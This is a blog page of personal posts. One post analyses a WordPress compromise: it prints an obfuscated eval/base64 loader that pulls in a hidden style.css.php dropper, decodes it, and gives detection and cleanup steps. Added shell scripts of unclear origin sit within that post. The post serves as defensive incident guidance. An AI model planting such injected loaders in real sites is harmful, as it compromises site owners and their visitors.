Blog

  • Artisan 8-bit Photo Booth

    If you don’t already follow me on Twitter, you probably don’t know that I launched a new project last week. So take a minute and go check out Hipster Ipsum. You know, if you want to.

    I’ll admit that it’s kind of stupid — and making fun of hipsters is way played out by now — but this is one of those ideas that has been kicking around in my head for a while. And rather than just letting it flop around in my brainpan until someone else made it, I decided to carve out a little of my free time and actually ship it.

    I’m pretty happy with the results too. Here’s some of the text it’s generating:

    Jean shorts aliqua magna mollit. Whatever est leggings put a bird on it aesthetic sint tempor butcher. Keytar gluten-free fuck sustainable. Portland aesthetic chambray, Readymade nulla 8-bit bahn mi Austin keffiyeh Four Loko letterpress. Veniam skateboard deserunt vinyl nisi fugiat. Lo-fi accusamus sapiente, pariatur tofu aesthetic do leggings deserunt organic quis consequat.

    I’m sure that there’s plenty of hipster cliches that I’ve missed. So if you check out the site and see any that I might be missing, don’t hesitate to let me know!

  • This Comment Intentionally Left Blank

    So I’ve started running into some folks who have been getting comment moderation emails from their WordPress installs that look like this:

    From: WordPress <wordpress@example.com>
    Date: May 12, 2011 16:20
    Subject: [WordPress] Please moderate: “Hello World!”
    To: admin@example.com

    A new comment on the post “Hello World!” is waiting for your approval
    http://example.com/hello-world/

    Author : (IP: , )
    E-mail :
    URL :
    Whois : http://whois.arin.net/rest/ip/
    Comment:

    Approve it: http://example.com/wp-admin/comment.php?action=approve&c=0
    Trash it: http://example.com/wp-admin/comment.php?action=trash&c=0
    Spam it: http://example.com/wp-admin/comment.php?action=spam&c=0
    Currently 0 comments are waiting for approval. Please visit the moderation panel: http://example.com/wp-admin/edit-comments.php?comment_status=moderated

    Now I didn’t go and redact any information there — the emails are totally void of any comment data outside of the moderation links. That’s not right at all.

    So why does this happen? The answer is actually really simple. Almost embarrassingly so.

    To put it as plainly as possible, when comment moderation emails start showing up as blank, the wp_comments table has gone missing. If you look at some of your more popular posts or your comments panel, you’ll notice that everything is missing.

    It’s almost like your mom doesn’t even read your blog.

    Sometimes the table has completely disappeared, sometimes it’s just in need of a repair — but either way, you need to restore it to working order to make your comments happy again. And since hosts vary, I’m not going into the grisly details of running that restore. I’m sure there’s plenty of nerds on the internet who’d be happy to help tho.

    Addendum: I’d like to hope that you’re backing up your install and database regularly. And if you’re not, maybe your hosting company is. Any worthwhile host will. But you should never ever depend on a single point of failure. I like to keep around 3 to 5, but I’m sort of paranoid.

    Remember, there’s never such a thing as too many backups!

    Good luck!

  • The Ol’ Switcheroo

    After a year of running this domain under nginx with XCache, I’ve decided to roll things back over to Apache for the time being.

    While nginx has been great when it came to system resources, I’ve never been able to get it to play nicely with Super Cache. I mean, things were caching just fine — but expired stuff hung around forever. And while I like my tweets, photos and Pinboard links from a few days ago, I’d rather show my visitors fresh content.

    Besides, I’ve seriously been itching to use mod_pagespeed and PHP 5.3 on my personal site. And since neither of those things are available under the DreamHost install of nginx, my hand was forced.

    But not all hope is lost! Being the huge nerd that I am, I’ll probably switch back to nginx once PHP-FPM support gets added into the DreamHost PHP 5.3 install.

  • Jobs in Carbonite

    Fucking. Epic.

    Oh, it also happens to be available as an iPhone case or skin.

    You know, if you’re into that sort of thing.

  • PS22 Chorus + Freelance Whales

    https://www.youtube.com/watch?v=sRa2HUEN4po
    I seriously love the version of “Generator ^ First Floor” that the PS22 Chorus did here. It’s pretty damn epic.

    Then again, it doesn’t hurt that the Freelance Whales are hanging out and backing them up. Great, great, great song.

  • Friendly WordPress Upgrade Reminders

    If you weren’t already aware, the gang at WordPress just shipped a pretty critical security update. In fact, it’s kind of a big deal. So much so that I went around and patched all my sites the second their update on the matter hit my phone.

    Since I’ve put a lot of energy into helping folks recover their hacked sites as of late, I figured I’d draw up a quick Twitter PSA for a few of my friends who make a living thru their WP sites:

    You *really* need to upgrade the copy of WordPress on your blog when you get a chance. Go to “Dashboard > Updates” in wp-admin to run one.

    After sending that out as a direct message a handful of times, I figured that some of the other nerds out there might appreciate having that too. So here it is — feel free to use it as you see fit!

    P.S. Should you not know how to check the version number on a friend’s WordPress site you can normally locate it using one of two methods:

    1. Use view source in your browser and then do a find for “generator”. That should show you the meta tag that WordPress inserts into the page for usage metrics and such.
    2. Add “readme.html” to the end of the blog URL. This doesn’t always work, but most folks leave the WordPress ReadMe file (which contains WP’s version number) in place.

  • WordPress, style.css.php and You

    I’ve been seeing this code crop up a lot in some of the recent WordPress hacks that I’ve had to diagnose:

    < ?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL3VzZXIvZG9tYWluLmNvbS93cC1pbmNsdWRlcy9qcy90aW55bWNlL3RoZW1lcy9hZHZhbmNlZC9za2lucy93cF90aGVtZS9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

    Most folks with this issue have a problem with “wp-login.php” returning a blank page for users trying to get into “wp-admin” — so if you’re seeing that, it may be a good sign that this is to blame.

    Running that bit of nastiness above thru a base64 decoder gets us this:

    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/user/domain.com/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

    Hrm. Let’s go ahead and have a look at “wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/”…

    -rw-r--r-- 2 user group 13789 2010-08-10 06:20 bi
    -rw-r--r-- 1 user group 212 2008-10-28 03:59 butt2.png
    -rw-r--r-- 1 user group 5859 2008-01-31 10:10 button_bg.png
    -rw-r--r-- 2 user group 880 2010-12-26 02:32 cnf
    -rw-r--r-- 2 user group 50 2010-12-24 03:38 csi
    -rw-r--r-- 1 user group 60 2008-01-31 10:10 down_arrow.gif
    -rw-r--r-- 1 user group 785 2008-01-31 10:10 fade-butt.png
    -rw-r--r-- 2 user group 1223 2010-07-29 20:55 ggl
    -rw-r--r-- 2 user group 68 2010-04-07 22:44 kwd
    -rw-r--r-- 2 user group 23813 2010-12-26 02:32 lb
    -rw-r--r-- 2 user group 0 2010-04-07 07:35 lock
    -rw-r--r-- 2 user group 225 2010-12-24 03:38 rlf
    -rw-r--r-- 2 user group 62159 2010-03-29 19:23 s.php
    -rw-r--r-- 1 user group 57 2008-01-31 10:10 separator.gif
    -rw-r--r-- 2 user group 89338 2010-03-30 02:09 skwd
    -rw-r--r-- 2 user group 254760 2010-12-23 03:06 style.css.php
    -rw-r--r-- 2 user group 402 2010-03-30 02:09 swf
    -rw-r--r-- 1 user group 1326 2008-02-21 13:40 tabs.gif

    Wait a minute. That directory in a fresh install looks like…

    -rw-r--r-- 1 user group 212 2010-12-08 12:59 butt2.png
    -rw-r--r-- 1 user group 5859 2010-12-08 12:59 button_bg.png
    -rw-r--r-- 1 user group 60 2010-12-08 12:59 down_arrow.gif
    -rw-r--r-- 1 user group 785 2010-12-08 12:59 fade-butt.png
    -rw-r--r-- 1 user group 57 2010-12-08 12:59 separator.gif
    -rw-r--r-- 1 user group 1326 2010-12-08 12:59 tabs.gif

    So “style.css.php” shouldn’t even exist at that location.  In fact, its existence is a solid indicator that your site has been flat out pwn3d.
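
The same fresh-install comparison can be run over all of wp-admin and wp-includes instead of one directory. This is an added example, not code from the original post: the helper name and paths are made up, and it assumes you have unpacked a pristine copy of the same WordPress version somewhere to compare against.

```sh
#!/bin/sh
# unexpected_core_files LIVE FRESH   (hypothetical helper, not from the post)
# LIVE  = the WordPress install under suspicion
# FRESH = a pristine unpack of the same WordPress version (assumed to exist)
# wp-admin/ and wp-includes/ hold only core files, so anything listed is suspect.
unexpected_core_files() {
    live=$1
    fresh=$2
    (cd "$live" && find wp-admin wp-includes -type f 2>/dev/null | LC_ALL=C sort) |
    while IFS= read -r f; do
        if [ ! -f "$fresh/$f" ]; then
            # Not shipped by WordPress at all, like style.css.php above.
            printf 'EXTRA    %s\n' "$f"
        elif ! cmp -s "$live/$f" "$fresh/$f"; then
            # Shipped by WordPress, but the contents were changed.
            printf 'MODIFIED %s\n' "$f"
        fi
    done
}

# Run as a script: sh check-core.sh /path/to/live /path/to/fresh
if [ "$#" -eq 2 ]; then
    unexpected_core_files "$1" "$2"
fi
```

EXTRA lines are files WordPress never shipped; MODIFIED lines are core files whose contents no longer match the pristine copy.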

    If you have access to a BSD or Linux shell and do a recursive grep for the first 10 characters piped to a line count at the root of your WordPress install, you’ll get a pretty solid idea of how many files the hackers have managed to infect.

    grep -Rl aWYoZnVuY3 . | wc -l

    Just to give you a baseline measurement, I’ve personally seen this code crop up in anywhere from 300 to 1100 files. It really tries its best to be impossible to get rid of. Simply unpacking a fresh copy of WordPress over the top of the hacked site won’t work. This nasty piece of work gets into your themes, plugins and even your cached pages.
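
To see where those hits are concentrated, and which file the injected line pulls in on your own host, the count can be broken down by area and the payloads decoded. This is an added example, not code from the original post: the function names are made up for illustration, and it assumes GNU grep and GNU base64.

```sh
#!/bin/sh
# Marker from the post: first 10 characters of the injected base64 payload.
MARKER='aWYoZnVuY3'

# infected_by_area ROOT   (hypothetical helper name)
# Counts files containing MARKER per top-level entry, splitting wp-content
# one level deeper (themes, plugins, cache, ...), as "COUNT AREA" lines.
infected_by_area() {
    (cd "$1" && grep -RlF -- "$MARKER" . 2>/dev/null) |
    awk -F/ '{ a = ($2 == "wp-content" && NF > 3) ? ($2 "/" $3) : $2; n[a]++ }
             END { for (a in n) printf "%d %s\n", n[a], a }' |
    LC_ALL=C sort -k2
}

# dropper_paths ROOT   (hypothetical helper name)
# Decodes each distinct base64_decode('...') payload that starts with MARKER
# and prints the absolute .php paths the decoded code refers to, i.e. where
# the included file (style.css.php in the post) lives on this host.
dropper_paths() {
    (cd "$1" && grep -RhoE -- "base64_decode\('${MARKER}[A-Za-z0-9+/=]*'\)" . 2>/dev/null) |
    LC_ALL=C sort -u |
    while IFS= read -r call; do
        b64=${call#*\'}      # drop everything up to the opening quote
        b64=${b64%\'*}       # drop the closing quote and parenthesis
        printf '%s' "$b64" | base64 -d 2>/dev/null || true   # GNU coreutils flag
        echo
    done |
    grep -oE "'/[^']*\.php'" | tr -d "'" | LC_ALL=C sort -u
}

# Run as a script: sh scan.sh /path/to/wordpress
if [ "$#" -eq 1 ]; then
    infected_by_area "$1"
    dropper_paths "$1"
fi
```

Every path printed by dropper_paths is a file to inspect and keep in your backup copy for reference; an empty result after the rebuild means no marked payloads remain under that root.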

    So what do we do to fix it? I’m glad you asked.

    1. Make a backup copy of your current WordPress install. This means on your local computer or in a non-web accessible directory on your host.
    2. Remove the injected eval statement from the top of the infected “wp-config.php” file.
    3. Clear out your site’s directory. LEAVE. NOTHING. BEHIND.
    4. Install a fresh copy of WordPress into the now clean directory.
    5. Drop the tidied up copy of “wp-config.php” into the new install’s root directory.
    6. Restore your uploads directory (if you actually use it, that is).
    7. Install fresh copies of any WordPress themes and plugins you might need. DO NOT COPY OVER ANY PLUGINS OR THEMES FROM THE INFECTED INSTALL!
    8. Since the hacker had enough access to your site to insert their crap, assume that they now have your password info. Change the passwords for your MySQL and WordPress admin users as soon as you can. If you need help with that, the support staff at your host should be able to sort you out.

    Now you’re back to (mostly) normal. You may have to make some customizations to your theme here and there — but having to do that is way better than letting your site stay hacked.

    Oh, and just to be safe, consider installing Exploit Scanner in your copy of WordPress and running it against your database.  The last thing I’d want is for you to spend all that time cleaning up your site just to have it pwn3d a second time.

    Good luck!

    P.S. If you do manage to spot something in that scan, let me know! I haven’t had to do a clean-up on one of the installs that I maintain just yet, so any extra info y’all can hook me up with would be helpful for everyone out there affected by this.

    Update: I just got to do a cleanup of a friend’s site who was unfortunate enough to get hit. It looks like the database on their site isn’t hiding anything nasty. Still, it’s a wise idea to run Exploit Scanner just to make sure there aren’t any variants of the attack that do write to the database.

  • Lighten Up

    I understand putting a little milk in one’s coffee — but “lightener” just sounds nasty.

  • The 30 Steps To Mastery

    Dear Ben Casnocha,

    You totally fucking nailed it, dude.

    1. Start
    2. Keep going.
    3. You think you’re starting to get the hang of it.
    4. You see someone else’s work and feel undeniable misery.
    5. Keep going.
    6. Keep going.
    7. You feel like maybe, possibly, you kinda got it now.
    8. You don’t.
    9. Keep going.

    Read the remainder here.

  • Blog Days Are Over

    Earlier this morning I confirmed the domain transfers for something that I spent almost six years of my life on. A site that I both obsessed over and neglected terribly.

    As of 8 AM, Preshrunk is somebody else’s baby. Saying that is a real punch in the (emotional) dick, but at least I know it’s in good hands now.

    I’m not going to use this post to talk about why I sold the site. That’s already been covered in enough detail. All I really want to say is that I’m happy it went to a good home.

    Oh, I’m also happy that I can pay off a respectable chunk of our wedding loan — but that’s only because the interest rate is embarrassingly high.

    Hopefully I’ll have a little more time to post here now. Considering my track record tho, I wouldn’t hold my breath for that…